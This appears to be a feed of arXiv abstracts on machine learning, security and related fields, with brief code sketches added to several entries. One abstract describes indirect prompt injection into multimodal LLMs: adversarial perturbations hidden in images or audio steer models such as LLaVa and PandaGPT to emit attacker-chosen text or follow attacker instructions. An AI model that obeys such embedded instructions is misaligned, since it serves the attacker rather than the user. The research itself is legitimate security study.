Large language models (LLMs) have been massively applied to many tasks, often surpassing state-of-the-art approaches. While their effectiveness in code generation has been extensively studied (e.g., AlphaCode), their potential for code detection remains unexplored. This work presents the first analysis of code detection using LLMs. Our study examines essential kernels, including matrix multiplication, convolution, and the fast Fourier transform, implemented in C/C++. We propose both a preliminary, naive prompt and a novel prompting strategy for code detection. Results reveal that conventional prompting achieves great precision but poor accuracy (68.8%, 22.3%, and 79.2% for GEMM, convolution, and FFT, respectively) due to a high number of false positives. Our novel prompting strategy substantially reduces false positives, resulting in excellent overall accuracy (91.1%, 97.9%, and 99.7%, respectively). These results pose a considerable challenge to existing state-of-the-art code detection methods.
    Tapestry of Time and Actions: Modeling Human Activity Sequences using Temporal Point Process Flows. (arXiv:2307.10305v1 [cs.CV])
    Human beings always engage in a vast range of activities and tasks that demonstrate their ability to adapt to different scenarios. Any human activity can be represented as a temporal sequence of actions performed to achieve a certain goal. Unlike the time series datasets extracted from electronics or machines, these action sequences are highly disparate in their nature -- the time to finish a sequence of actions can vary between different persons. Therefore, understanding the dynamics of these sequences is essential for many downstream tasks such as activity length prediction, goal prediction, next action recommendation, etc. Existing neural network-based approaches that learn a continuous-time activity sequence (or CTAS) are limited to the presence of only visual data or are designed specifically for a particular task, i.e., limited to next action or goal prediction. In this paper, we present ProActive, a neural marked temporal point process (MTPP) framework for modeling the continuous-time distribution of actions in an activity sequence while simultaneously addressing three high-impact problems -- next action prediction, sequence-goal prediction, and end-to-end sequence generation. Specifically, we utilize a self-attention module with temporal normalizing flows to model the influence and the inter-arrival times between actions in a sequence. In addition, we propose a novel addition over the ProActive model that can handle variations in the order of actions, i.e., different methods of achieving a given goal. We demonstrate that this variant can learn the order in which the person or actor prefers to do their actions. Extensive experiments on sequences derived from three activity recognition datasets show the significant accuracy boost of ProActive over the state-of-the-art in terms of action and goal prediction, and the first-ever application of end-to-end action sequence generation.
    Fisher-Rao distance and pullback SPD cone distances between multivariate normal distributions. (arXiv:2307.10644v1 [cs.LG])
Data sets of multivariate normal distributions abound in many scientific areas like diffusion tensor imaging, structure tensor computer vision, radar signal processing, and machine learning, just to name a few. In order to process those normal data sets for downstream tasks like filtering, classification or clustering, one needs to define proper notions of dissimilarities between normals and paths joining them. The Fisher-Rao distance, defined as the Riemannian geodesic distance induced by the Fisher information metric, is such a principled metric distance which, however, is not known in closed form except for a few particular cases. In this work, we first report a fast and robust method to approximate arbitrarily finely the Fisher-Rao distance between multivariate normal distributions. Second, we introduce a class of distances based on diffeomorphic embeddings of the normal manifold into a submanifold of the higher-dimensional symmetric positive-definite cone corresponding to the manifold of centered normal distributions. We show that the projective Hilbert distance on the cone yields a metric on the embedded normal submanifold and we pull back that cone distance with its associated straight line Hilbert cone geodesics to obtain a distance and smooth paths between normal distributions. Compared to the Fisher-Rao distance approximation, the pullback Hilbert cone distance is computationally light since it requires computing only the extreme minimal and maximal eigenvalues of matrices. Finally, we show how to use those distances in clustering tasks.
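The remark that the pullback Hilbert cone distance needs only the extreme eigenvalues can be made concrete for the SPD part: the Hilbert projective distance between SPD matrices A and B is log(lambda_max / lambda_min), where the lambdas are the extreme generalized eigenvalues of the pencil (B, A). A sketch (the Cholesky reduction is a standard trick, not necessarily the paper's implementation):

```python
import numpy as np

def hilbert_spd_distance(A, B):
    """Hilbert projective distance between SPD matrices A and B:
    log of the ratio of the extreme eigenvalues of A^{-1} B.
    Whitening with a Cholesky factor of A makes the problem symmetric,
    so eigvalsh (which returns sorted real eigenvalues) applies."""
    L = np.linalg.cholesky(A)
    Linv = np.linalg.inv(L)
    M = Linv @ B @ Linv.T            # symmetric, same spectrum as A^{-1} B
    w = np.linalg.eigvalsh(M)        # ascending eigenvalues
    return float(np.log(w[-1] / w[0]))
```

Note the projective nature: scaling B by any positive constant leaves the distance unchanged, which is why it is a metric on the cone's projectivization rather than on the cone itself.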
    PreDiff: Precipitation Nowcasting with Latent Diffusion Models. (arXiv:2307.10422v1 [cs.LG])
    Earth system forecasting has traditionally relied on complex physical models that are computationally expensive and require significant domain expertise. In the past decade, the unprecedented increase in spatiotemporal Earth observation data has enabled data-driven forecasting models using deep learning techniques. These models have shown promise for diverse Earth system forecasting tasks but either struggle with handling uncertainty or neglect domain-specific prior knowledge, resulting in averaging possible futures to blurred forecasts or generating physically implausible predictions. To address these limitations, we propose a two-stage pipeline for probabilistic spatiotemporal forecasting: 1) We develop PreDiff, a conditional latent diffusion model capable of probabilistic forecasts. 2) We incorporate an explicit knowledge control mechanism to align forecasts with domain-specific physical constraints. This is achieved by estimating the deviation from imposed constraints at each denoising step and adjusting the transition distribution accordingly. We conduct empirical studies on two datasets: N-body MNIST, a synthetic dataset with chaotic behavior, and SEVIR, a real-world precipitation nowcasting dataset. Specifically, we impose the law of conservation of energy in N-body MNIST and anticipated precipitation intensity in SEVIR. Experiments demonstrate the effectiveness of PreDiff in handling uncertainty, incorporating domain-specific prior knowledge, and generating forecasts that exhibit high operational utility.
    Hidden Markov Models with Random Restarts vs Boosting for Malware Detection. (arXiv:2307.10256v1 [cs.CR])
Effective and efficient malware detection is at the forefront of research into building secure digital systems. As with many other fields, malware detection research has seen a dramatic increase in the application of machine learning algorithms. One machine learning technique that has been used widely in the field of pattern matching in general, and malware detection in particular, is hidden Markov models (HMMs). HMM training is based on a hill climb, and hence we can often improve a model by training multiple times with different initial values. In this research, we compare boosted HMMs (using AdaBoost) to HMMs trained with multiple random restarts, in the context of malware detection. These techniques are applied to a variety of challenging malware datasets. We find that random restarts perform surprisingly well in comparison to boosting. Only in the most difficult "cold start" cases (where training data is severely limited) does boosting appear to offer sufficient improvement to justify its higher computational cost in the scoring phase.
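The random-restart idea above is generic: because Baum-Welch (HMM training) is a hill climb that stops at the nearest local optimum of the log-likelihood, running it from several random initializations and keeping the best-scoring model often helps. A toy sketch with a 1D objective standing in for the HMM log-likelihood (the hill-climb and the function below are illustrative assumptions, not the paper's setup):

```python
import random

def hill_climb(f, x0, step=0.1, iters=200):
    """Greedy local search: the same failure mode as Baum-Welch, in that it
    stops at the local optimum of f nearest to the starting point x0."""
    x = x0
    for _ in range(iters):
        cand = max((x - step, x, x + step), key=f)
        if cand == x:
            break
        x = cand
    return x

def best_of_restarts(f, n_restarts, lo, hi, seed=0):
    """Run hill_climb from several random initial values and keep the best,
    mirroring HMM training with random restarts, where one keeps the model
    with the highest training log-likelihood."""
    rng = random.Random(seed)
    starts = [rng.uniform(lo, hi) for _ in range(n_restarts)]
    return max((hill_climb(f, x0) for x0 in starts), key=f)
```

A single run started on the wrong side of a valley settles on the inferior peak; the restart harness reliably recovers the global one, which is the effect the paper weighs against the cost of boosting.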
    Student Assessment in Cybersecurity Training Automated by Pattern Mining and Clustering. (arXiv:2307.10260v1 [cs.CR])
Hands-on cybersecurity training allows students and professionals to practice various tools and improve their technical skills. The training occurs in an interactive learning environment that enables completing sophisticated tasks in full-fledged operating systems, networks, and applications. During the training, the learning environment allows collecting data about trainees' interactions with the environment, such as their usage of command-line tools. These data contain patterns indicative of trainees' learning processes, and revealing them makes it possible to assess the trainees and provide feedback to help them learn. However, automated analysis of these data is challenging. The training tasks feature complex problem-solving, and many different solution approaches are possible. Moreover, the trainees generate vast amounts of interaction data. This paper explores a dataset from 18 cybersecurity training sessions using data mining and machine learning techniques. We employed pattern mining and clustering to analyze 8834 commands collected from 113 trainees, revealing their typical behavior, mistakes, solution strategies, and difficult training stages. Pattern mining proved suitable in capturing timing information and tool usage frequency. Clustering underlined that many trainees often face the same issues, which can be addressed by targeted scaffolding. Our results show that data mining methods are suitable for analyzing cybersecurity training data. Educational researchers and practitioners can apply these methods in their contexts to assess trainees, support them, and improve the training design. Artifacts associated with this research are publicly available.
    Improving Multimodal Datasets with Image Captioning. (arXiv:2307.10350v1 [cs.LG])
    Massive web datasets play a key role in the success of large vision-language models like CLIP and Flamingo. However, the raw web data is noisy, and existing filtering methods to reduce noise often come at the expense of data diversity. Our work focuses on caption quality as one major source of noise, and studies how generated captions can increase the utility of web-scraped datapoints with nondescript text. Through exploring different mixing strategies for raw and generated captions, we outperform the best filtering method proposed by the DataComp benchmark by 2% on ImageNet and 4% on average across 38 tasks, given a candidate pool of 128M image-text pairs. Our best approach is also 2x better at Flickr and MS-COCO retrieval. We then analyze what makes synthetic captions an effective source of text supervision. In experimenting with different image captioning models, we also demonstrate that the performance of a model on standard image captioning benchmarks (e.g., NoCaps CIDEr) is not a reliable indicator of the utility of the captions it generates for multimodal training. Finally, our experiments with using generated captions at DataComp's large scale (1.28B image-text pairs) offer insights into the limitations of synthetic text, as well as the importance of image curation with increasing training data quantity.
    Privacy Amplification via Importance Sampling. (arXiv:2307.10187v1 [cs.CR])
    We examine the privacy-enhancing properties of subsampling a data set via importance sampling as a pre-processing step for differentially private mechanisms. This extends the established privacy amplification by subsampling result to importance sampling where each data point is weighted by the reciprocal of its selection probability. The implications for privacy of weighting each point are not obvious. On the one hand, a lower selection probability leads to a stronger privacy amplification. On the other hand, the higher the weight, the stronger the influence of the point on the output of the mechanism in the event that the point does get selected. We provide a general result that quantifies the trade-off between these two effects. We show that heterogeneous sampling probabilities can lead to both stronger privacy and better utility than uniform subsampling while retaining the subsample size. In particular, we formulate and solve the problem of privacy-optimal sampling, that is, finding the importance weights that minimize the expected subset size subject to a given privacy budget. Empirically, we evaluate the privacy, efficiency, and accuracy of importance sampling-based privacy amplification on the example of k-means clustering.
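    The core reweighting idea can be sketched with a Horvitz-Thompson-style estimate; the selection probabilities below are illustrative, not the privacy-optimal weights the paper derives:

```python
import numpy as np

rng = np.random.default_rng(0)
x = rng.normal(loc=3.0, size=10_000)

# Illustrative heterogeneous selection probabilities: larger-magnitude
# points are kept more often (clipped away from zero).
p = np.clip(np.abs(x) / np.abs(x).max(), 0.05, 1.0)

keep = rng.random(x.size) < p
# Each retained point is weighted by the reciprocal of its selection
# probability, so the subsample estimate stays unbiased.
w = 1.0 / p[keep]

estimate = np.sum(w * x[keep]) / x.size
print(f"subsample estimate {estimate:.3f} vs full-data mean {x.mean():.3f}")
```

    The privacy analysis in the paper then quantifies how a low selection probability (stronger amplification) trades off against the larger weight a selected point receives.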
    A data science axiology: the nature, value, and risks of data science. (arXiv:2307.10460v1 [cs.AI])
    Data science is not a science. It is a research paradigm with an unfathomed scope, scale, complexity, and power for knowledge discovery that is not otherwise possible and can be beyond human reasoning. It is already changing our world practically and profoundly, widely deployed in tens of thousands of applications in every discipline, in an AI Arms Race that, due to its inscrutability, can lead to unfathomed risks. This paper presents an axiology of data science: its purpose, nature, importance, risks, and value for problem solving, explored by evaluating its remarkable, definitive features. As data science is in its infancy, this initial, speculative axiology is intended to aid in understanding and defining data science and in recognizing its potential benefits, risks, and open research challenges. AI-based data science is inherently about uncertainty, which may be more realistic than our preference for the certainty of science. Data science will have impacts far beyond knowledge discovery and will take us into new ways of understanding the world.
    An IPW-based Unbiased Ranking Metric in Two-sided Markets. (arXiv:2307.10204v1 [cs.IR])
    In modern recommendation systems, unbiased learning-to-rank (LTR) is crucial for prioritizing items from biased implicit user feedback, such as click data. Several techniques, such as Inverse Propensity Weighting (IPW), have been proposed for single-sided markets. However, less attention has been paid to two-sided markets, such as job platforms or dating services, where successful conversions require matching preferences from both users. This paper addresses the complex interaction of biases between users in two-sided markets and proposes a tailored LTR approach. We first present a formulation of feedback mechanisms in two-sided matching platforms and point out that their implicit feedback may include position bias from both user groups. On the basis of this observation, we extend the IPW estimator and propose a new estimator, named two-sided IPW, to address the position biases in two-sided markets. We prove that the proposed estimator satisfies the unbiasedness for the ground-truth ranking metric. We conducted numerical experiments on real-world two-sided platforms and demonstrated the effectiveness of our proposed method in terms of both precision and robustness. Our experiments showed that our method outperformed baselines especially when handling rare items, which are less frequently observed in the training data.
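    A minimal sketch of the two-sided reweighting idea, assuming a simple rank-decay examination model (the propensity function and logged data here are invented, not the paper's):

```python
def examination_propensity(rank):
    # Hypothetical position-bias model: the probability that a user
    # examines an item decays with its displayed rank (0 = top).
    return 1.0 / (1.0 + rank)

# Logged interactions: (rank shown to the sender, rank shown to the
# receiver, 1 if the match converted). Invented for illustration.
logs = [(0, 1, 1), (2, 0, 1), (4, 3, 0), (1, 5, 1)]

# Two-sided IPW: reweight each conversion by the inverse product of
# BOTH sides' examination propensities, correcting position bias from
# both user groups at once.
weights = [c / (examination_propensity(ra) * examination_propensity(rb))
           for ra, rb, c in logs]
print(weights)
```

    Single-sided IPW would divide by only one of the two propensities and so under-correct whenever the other side's ranking also hid the item.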
    A New Computationally Simple Approach for Implementing Neural Networks with Output Hard Constraints. (arXiv:2307.10459v1 [cs.LG])
    A new computationally simple method of imposing hard convex constraints on neural network output values is proposed. The key idea behind the method is to map a vector of hidden parameters of the network to a point that is guaranteed to be inside the feasible set defined by a set of constraints. The mapping is implemented by an additional neural network layer that enforces the constraints on its output. The proposed method extends naturally to the case where constraints are imposed not only on the output vectors but also jointly on outputs and inputs. The projection approach to imposing constraints on outputs can also be implemented in the framework of the proposed method. It is shown how to incorporate different types of constraints into the proposed method, including linear and quadratic constraints, equality constraints, dynamic constraints, and constraints in the form of boundaries. An important feature of the method is its computational simplicity. The complexity of the forward pass of the proposed neural network layer is O(n*m) for linear constraints and O(n^2*m) for quadratic constraints, where n is the number of variables and m is the number of constraints. Numerical experiments illustrate the method by solving optimization and classification problems. The code implementing the method is publicly available.
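    For the special case of boundary (box) constraints, the idea of a layer that maps hidden values to a guaranteed-feasible point can be sketched as follows; general convex constraints, which the paper handles, require a richer mapping than this sigmoid squashing:

```python
import numpy as np

def box_constrained_layer(z, lo, hi):
    # Squash unconstrained activations z into [lo, hi] elementwise, so
    # the output satisfies the constraints by construction: no
    # projection or post-processing is needed at inference time.
    s = 1.0 / (1.0 + np.exp(-z))
    return lo + (hi - lo) * s

z = np.array([-5.0, 0.0, 7.0])   # arbitrary hidden activations
lo = np.array([0.0, -1.0, 2.0])
hi = np.array([1.0, 1.0, 3.0])
y = box_constrained_layer(z, lo, hi)
print(y)
```

    The cost per output is a handful of elementwise operations, which is what makes hard-constrained outputs cheap compared with solving a projection problem at every forward pass.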
    Uncertainty Quantification for Molecular Property Predictions with Graph Neural Architecture Search. (arXiv:2307.10438v1 [cs.LG])
    Graph Neural Networks (GNNs) have emerged as a prominent class of data-driven methods for molecular property prediction. However, a key limitation of typical GNN models is their inability to quantify uncertainties in the predictions. This capability is crucial for ensuring the trustworthy use and deployment of models in downstream tasks. To that end, we introduce AutoGNNUQ, an automated uncertainty quantification (UQ) approach for molecular property prediction. AutoGNNUQ leverages architecture search to generate an ensemble of high-performing GNNs, enabling the estimation of predictive uncertainties. Our approach employs variance decomposition to separate data (aleatoric) and model (epistemic) uncertainties, providing valuable insights for reducing them. In our computational experiments, we demonstrate that AutoGNNUQ outperforms existing UQ methods in terms of both prediction accuracy and UQ performance on multiple benchmark datasets. Additionally, we utilize t-SNE visualization to explore correlations between molecular features and uncertainty, offering insight for dataset improvement. AutoGNNUQ has broad applicability in domains such as drug discovery and materials science, where accurate uncertainty quantification is crucial for decision-making.
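    The variance decomposition the abstract mentions can be sketched for a Gaussian-output ensemble (the predicted means and variances below are invented numbers, not model outputs):

```python
import numpy as np

# Each ensemble member predicts a mean and a variance for one molecule.
means = np.array([1.0, 1.2, 0.9, 1.1])          # per-model predicted means
variances = np.array([0.05, 0.04, 0.06, 0.05])  # per-model predicted variances

aleatoric = variances.mean()  # data noise: average of the predicted variances
epistemic = means.var()       # model disagreement: variance of the predicted means
total = aleatoric + epistemic
print(f"aleatoric={aleatoric:.4f} epistemic={epistemic:.4f} total={total:.4f}")
```

    High epistemic uncertainty flags molecules where more training data or more models would help; high aleatoric uncertainty flags noise that no model can remove.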
    Several categories of Large Language Models (LLMs): A Short Survey. (arXiv:2307.10188v1 [cs.CL])
    Large Language Models (LLMs) have become effective tools for natural language processing and have been used in many different fields. This essay offers a succinct summary of various LLM subcategories. The survey emphasizes recent developments and efforts made for various kinds of LLMs, including task-based financial LLMs, multilingual LLMs, biomedical and clinical LLMs, vision language LLMs, and code language models. The survey gives a general summary of the methods, attributes, datasets, transformer models, and comparison metrics applied in each category of LLMs. Furthermore, it highlights unresolved problems in the field of developing chatbots and virtual assistants, such as boosting natural language processing, enhancing chatbot intelligence, and resolving moral and legal dilemmas. The purpose of this study is to provide readers, developers, academics, and users interested in LLM-based chatbots and virtual intelligent assistant technologies with useful information and future directions.
    Selection functions of strong lens finding neural networks. (arXiv:2307.10355v1 [astro-ph.CO])
    Convolutional Neural Networks trained for the task of lens finding, with architectures and training data similar to those commonly found in the literature, are biased classifiers. An understanding of the selection function of lens finding neural networks will be key to fully realising the potential of the large samples of strong gravitational lens systems that will be found in upcoming wide-field surveys. We use three training datasets, representative of those used to train galaxy-galaxy and galaxy-quasar lens finding neural networks. The networks preferentially select systems with larger Einstein radii and larger sources with more concentrated source-light distributions. Increasing the detection significance threshold to 12$\sigma$ from 8$\sigma$ results in 50 per cent of the selected strong lens systems having Einstein radii $\theta_\mathrm{E}$ $\ge$ 1.04 arcsec from $\theta_\mathrm{E}$ $\ge$ 0.879 arcsec, source radii $R_S$ $\ge$ 0.194 arcsec from $R_S$ $\ge$ 0.178 arcsec and source Sérsic indices $n_{\mathrm{Sc}}^{\mathrm{S}}$ $\ge$ 2.62 from $n_{\mathrm{Sc}}^{\mathrm{S}}$ $\ge$ 2.55. The model trained to find lensed quasars shows a stronger preference for higher lens ellipticities than those trained to find lensed galaxies. The selection function is independent of the slope of the power-law of the mass profiles, hence measurements of this quantity will be unaffected. The lens finder selection function reinforces that of the lensing cross-section, and thus we expect our findings to be a general result for all galaxy-galaxy and galaxy-quasar lens finding neural networks.
    Efficient selective attention LSTM for well log curve synthesis. (arXiv:2307.10253v1 [cs.LG])
    Non-core drilling has gradually become the primary exploration method in geological engineering, and well logging curves have increasingly gained importance as the main carriers of geological information. However, factors such as geological environment, logging equipment, borehole quality, and unexpected events can all impact the quality of well logging curves. Previous methods of re-logging or manual corrections have been associated with high costs and low efficiency. This paper proposes a machine learning method that utilizes existing data to predict missing well logging curves, and its effectiveness and feasibility have been validated through experiments. The proposed method builds upon the traditional Long Short-Term Memory (LSTM) neural network by incorporating a self-attention mechanism to analyze the spatial dependencies of the data. It selectively includes the dominant computational results in the LSTM, reducing the computational complexity from O(n^2) to O(nlogn) and improving model efficiency. Experimental results demonstrate that the proposed method achieves higher accuracy compared to traditional curve synthesis methods based on Fully Connected Neural Networks (FCNN) and LSTM. This accurate, efficient, and cost-effective prediction method holds practical value in engineering applications.
    Hyperparameter Tuning Cookbook: A guide for scikit-learn, PyTorch, river, and spotPython. (arXiv:2307.10262v1 [cs.LG])
    This document provides a comprehensive guide to hyperparameter tuning using spotPython for scikit-learn, PyTorch, and river. The first part introduces spotPython's surrogate model-based optimization process, while the second part focuses on hyperparameter tuning. Several case studies are presented, including hyperparameter tuning for sklearn models such as Support Vector Classification, Random Forests, Gradient Boosting (XGB), and K-nearest neighbors (KNN), as well as a Hoeffding Adaptive Tree Regressor from river. The integration of spotPython into the PyTorch and PyTorch Lightning training workflow is also discussed. With a hands-on approach and step-by-step explanations, this cookbook serves as a practical starting point for anyone interested in hyperparameter tuning with Python. Highlights include the interplay between Tensorboard, PyTorch Lightning, spotPython, and river. This publication is under development, with updates available on the corresponding webpage.
    StyleGAN2-based Out-of-Distribution Detection for Medical Imaging. (arXiv:2307.10193v1 [eess.IV])
    One barrier to the clinical deployment of deep learning-based models is the presence of images at runtime that lie far outside the training distribution of a given model. We aim to detect these out-of-distribution (OOD) images with a generative adversarial network (GAN). Our training dataset comprised 3,234 liver-containing computed tomography (CT) scans from 456 patients. Our OOD test data consisted of CT images of the brain, head and neck, lung, cervix, and abnormal livers. A StyleGAN2-ADA architecture was employed to model the training distribution. Images were reconstructed using backpropagation. Reconstructions were evaluated using the Wasserstein distance, mean squared error, and the structural similarity index measure. OOD detection was evaluated with the area under the receiver operating characteristic curve (AUROC). Our paradigm distinguished between liver and non-liver CT with greater than 90% AUROC. It was also completely unable to reconstruct liver artifacts, such as needles and ascites.
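    The detection principle, that a generative model of the training distribution reconstructs in-distribution images well and OOD images poorly, can be sketched with synthetic arrays standing in for CT slices and their GAN reconstructions (all values here are simulated, not real scans):

```python
import numpy as np

def ood_score(image, reconstruction):
    # Higher reconstruction error suggests the image lies outside the
    # distribution the generative model was trained on.
    return np.mean((image - reconstruction) ** 2)

rng = np.random.default_rng(1)
in_dist = rng.normal(size=(64, 64))
good_recon = in_dist + rng.normal(scale=0.05, size=(64, 64))  # near-perfect

ood = rng.normal(loc=3.0, size=(64, 64))   # e.g. a brain CT shown to a liver model
poor_recon = rng.normal(size=(64, 64))     # the model cannot reproduce it

print(ood_score(in_dist, good_recon), ood_score(ood, poor_recon))
```

    Thresholding this score (or the Wasserstein/SSIM variants the paper evaluates) yields the binary in/out decision scored by AUROC.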
    Evaluating and Enhancing Robustness of Deep Recommendation Systems Against Hardware Errors. (arXiv:2307.10244v1 [cs.IR])
    Deep recommendation systems (DRS) heavily depend on specialized HPC hardware and accelerators to optimize energy, efficiency, and recommendation quality. Despite the growing number of hardware errors observed in large-scale fleet systems where DRS are deployed, the robustness of DRS has been largely overlooked. This paper presents the first systematic study of DRS robustness against hardware errors. We develop Terrorch, a user-friendly, efficient and flexible error injection framework on top of the widely-used PyTorch. We evaluate a wide range of models and datasets and observe that the DRS robustness against hardware errors is influenced by various factors from model parameters to input characteristics. We also explore 3 error mitigation methods including algorithm based fault tolerance (ABFT), activation clipping and selective bit protection (SBP). We find that applying activation clipping can recover up to 30% of the degraded AUC-ROC score, making it a promising mitigation method.
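    Activation clipping, the mitigation that recovered the most degraded AUC-ROC, can be sketched in a few lines (the bound and activation values are illustrative, not taken from Terrorch):

```python
import numpy as np

def clip_activations(x, bound):
    # A flipped high-order bit in faulty hardware can turn an activation
    # into a huge value; clipping bounds the damage before it propagates
    # through the rest of the network.
    return np.clip(x, -bound, bound)

acts = np.array([0.3, -1.2, 2.0])
acts_faulted = acts.copy()
acts_faulted[1] = 6.5e4   # simulated bit-flip producing an extreme value

recovered = clip_activations(acts_faulted, bound=8.0)
print(recovered)
```

    The bound is typically chosen from the activation range observed on clean data, so normal activations pass through unchanged.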
    Fast Unsupervised Deep Outlier Model Selection with Hypernetworks. (arXiv:2307.10529v1 [cs.LG])
    Outlier detection (OD) finds many applications with a rich literature of numerous techniques. Deep neural network based OD (DOD) has seen a recent surge of attention thanks to the many advances in deep learning. In this paper, we consider a critical-yet-understudied challenge with unsupervised DOD, that is, effective hyperparameter (HP) tuning/model selection. While several prior works report the sensitivity of OD models to HPs, it becomes all the more critical for the modern DOD models that exhibit a long list of HPs. We introduce HYPER for tuning DOD models, tackling two fundamental challenges: (1) validation without supervision (due to lack of labeled anomalies), and (2) efficient search of the HP/model space (due to exponential growth in the number of HPs). A key idea is to design and train a novel hypernetwork (HN) that maps HPs onto optimal weights of the main DOD model. In turn, HYPER capitalizes on a single HN that can dynamically generate weights for many DOD models (corresponding to varying HPs), which offers significant speed-up. In addition, it employs meta-learning on historical OD tasks with labels to train a proxy validation function, which is likewise trained efficiently with our proposed HN. Extensive experiments on 35 OD tasks show that HYPER achieves high performance against 8 baselines with significant efficiency gains.
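    The central trick, a hypernetwork that maps a hyperparameter vector to the main model's weights, can be sketched with a linear hypernetwork; this is purely illustrative and far simpler than HYPER's actual architecture:

```python
import numpy as np

rng = np.random.default_rng(0)
hp_dim, n_weights = 2, 10
# Linear "hypernetwork" (for illustration): maps a hyperparameter
# vector, e.g. [learning_rate, dropout], to a weight vector for the
# main detector, so many HP settings can be scored without retraining
# the detector from scratch each time.
H = rng.normal(size=(n_weights, hp_dim)) * 0.1

def weights_for(hp):
    return H @ np.asarray(hp)

w1 = weights_for([0.01, 0.5])
w2 = weights_for([0.10, 0.2])
print(w1.shape, w2.shape)
```

    Searching the HP space then reduces to evaluating the hypernetwork at candidate HP vectors, which is the source of the speed-up the paper reports.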
    ECSIC: Epipolar Cross Attention for Stereo Image Compression. (arXiv:2307.10284v1 [eess.IV])
    In this paper, we present ECSIC, a novel learned method for stereo image compression. Our proposed method compresses the left and right images in a joint manner by exploiting the mutual information between the images of the stereo image pair using a novel stereo cross attention (SCA) module and two stereo context modules. The SCA module performs cross-attention restricted to the corresponding epipolar lines of the two images and processes them in parallel. The stereo context modules improve the entropy estimation of the second encoded image by using the first image as a context. We conduct an extensive ablation study demonstrating the effectiveness of the proposed modules and a comprehensive quantitative and qualitative comparison with existing methods. ECSIC achieves state-of-the-art performance among stereo image compression models on the two popular stereo image datasets Cityscapes and InStereo2k while allowing for fast encoding and decoding, making it highly practical for real-time applications.
    On the Sensitivity of Deep Load Disaggregation to Adversarial Attacks. (arXiv:2307.10209v1 [cs.CR])
    Non-intrusive Load Monitoring (NILM) algorithms, commonly referred to as load disaggregation algorithms, are fundamental tools for effective energy management. Despite the success of deep models in load disaggregation, they face various challenges, particularly those pertaining to privacy and security. This paper investigates the sensitivity of prominent deep NILM baselines to adversarial attacks, which have proven to be a significant threat in domains such as computer vision and speech recognition. Adversarial attacks entail the introduction of imperceptible noise into the input data with the aim of misleading the neural network into generating erroneous outputs. We investigate the Fast Gradient Sign Method (FGSM), a well-known adversarial attack, to perturb the input sequences fed into two commonly employed CNN-based NILM baselines: the Sequence-to-Sequence (S2S) and Sequence-to-Point (S2P) models. Our findings provide compelling evidence for the vulnerability of these models, particularly the S2P model, which exhibits an average decline of 20% in the F1-score even with small amounts of noise. Such a weakness has potentially profound implications for energy management systems in residential and industrial sectors that rely on NILM models.
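    FGSM itself is a one-line perturbation; a sketch on a toy window of power readings (the values and gradients are invented, and a real attack would obtain the gradient from the NILM model's loss):

```python
import numpy as np

def fgsm_perturb(x, grad, eps):
    # FGSM: move each input element by eps in the direction of the sign
    # of the loss gradient, keeping the perturbation imperceptibly small
    # while maximally increasing the loss to first order.
    return x + eps * np.sign(grad)

x = np.array([0.20, 0.55, 0.10])    # e.g. a window of aggregate power readings
grad = np.array([1.3, -0.7, 0.0])   # dLoss/dx from the disaggregation model
x_adv = fgsm_perturb(x, grad, eps=0.01)
print(x_adv)
```

    Each reading moves by at most eps, which is what makes the attack hard to detect in the input signal.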
    Disentangling Societal Inequality from Model Biases: Gender Inequality in Divorce Court Proceedings. (arXiv:2307.10200v1 [cs.CY])
    Divorce is the legal dissolution of a marriage by a court. Since this is usually an unpleasant outcome of a marital union, each party may have reasons to call the decision to quit, which are generally documented in detail in the court proceedings. Via a substantial corpus of 17,306 court proceedings, this paper investigates gender inequality through the lens of divorce court proceedings. While emerging data sources (e.g., public court records) on sensitive societal issues hold promise in aiding social science research, biases present in cutting-edge natural language processing (NLP) methods may interfere with or affect such studies. We thus require a thorough analysis of potential gaps and limitations present in extant NLP resources. In this paper, on the methodological side, we demonstrate that existing NLP resources required several non-trivial modifications to quantify societal inequalities. On the substantive side, we find that while a large number of court cases perhaps suggest changing norms in India where women are increasingly challenging patriarchy, AI-powered analyses of these court proceedings indicate striking gender inequality with women often subjected to domestic violence.
    A Bayesian Programming Approach to Car-following Model Calibration and Validation using Limited Data. (arXiv:2307.10437v1 [cs.LG])
    Traffic simulation software is used by transportation researchers and engineers to design and evaluate changes to roadways. These simulators are driven by models of microscopic driver behavior from which macroscopic measures like flow and congestion can be derived. Many models are designed for a subset of possible traffic scenarios and roadway configurations, while others have no explicit constraints on their application. Work zones (WZs) are one scenario for which no model to date has reproduced realistic driving behavior. This makes it difficult to optimize for safety and other metrics when designing a WZ. The Federal Highway Administration commissioned the USDOT Volpe Center to develop a car-following (CF) model for use in microscopic simulators that can capture and reproduce driver behavior accurately within and outside of WZs. Volpe also performed a naturalistic driving study to collect telematics data from vehicles driven on roads with WZs for use in model calibration. During model development, Volpe researchers observed difficulties in calibrating their model, leaving them to question whether there existed flaws in their model, in the data, or in the procedure used to calibrate the model using the data. In this thesis, I use Bayesian methods for data analysis and parameter estimation to explore and, where possible, address these questions. First, I use Bayesian inference to measure the sufficiency of the size of the data set. Second, I compare the procedure and results of the genetic algorithm based calibration performed by the Volpe researchers with those of Bayesian calibration. Third, I explore the benefits of modeling CF hierarchically. Finally, I apply what was learned in the first three phases using an established CF model, Wiedemann 99, to the probabilistic modeling of the Volpe model. Validation is performed using information criteria as an estimate of predictive accuracy.
    (Ab)using Images and Sounds for Indirect Instruction Injection in Multi-Modal LLMs. (arXiv:2307.10490v1 [cs.CR])
    We demonstrate how images and sounds can be used for indirect prompt and instruction injection in multi-modal LLMs. An attacker generates an adversarial perturbation corresponding to the prompt and blends it into an image or audio recording. When the user asks the (unmodified, benign) model about the perturbed image or audio, the perturbation steers the model to output the attacker-chosen text and/or make the subsequent dialog follow the attacker's instruction. We illustrate this attack with several proof-of-concept examples targeting LLaVa and PandaGPT.
    AUC Optimization from Multiple Unlabeled Datasets. (arXiv:2305.15776v2 [cs.LG] UPDATED)
    Weakly supervised learning aims to empower machine learning when perfect supervision is unavailable, which has drawn great attention from researchers. Among various types of weak supervision, one of the most challenging cases is to learn from multiple unlabeled (U) datasets with only a little knowledge of the class priors, or U$^m$ learning for short. In this paper, we study the problem of building an AUC (area under ROC curve) optimization model from multiple unlabeled datasets, which maximizes the pairwise ranking ability of the classifier. We propose U$^m$-AUC, an AUC optimization approach that converts the U$^m$ data into a multi-label AUC optimization problem, and can be trained efficiently. We show that the proposed U$^m$-AUC is effective theoretically and empirically.
    FinGPT: Democratizing Internet-scale Data for Financial Large Language Models. (arXiv:2307.10485v1 [cs.CL])
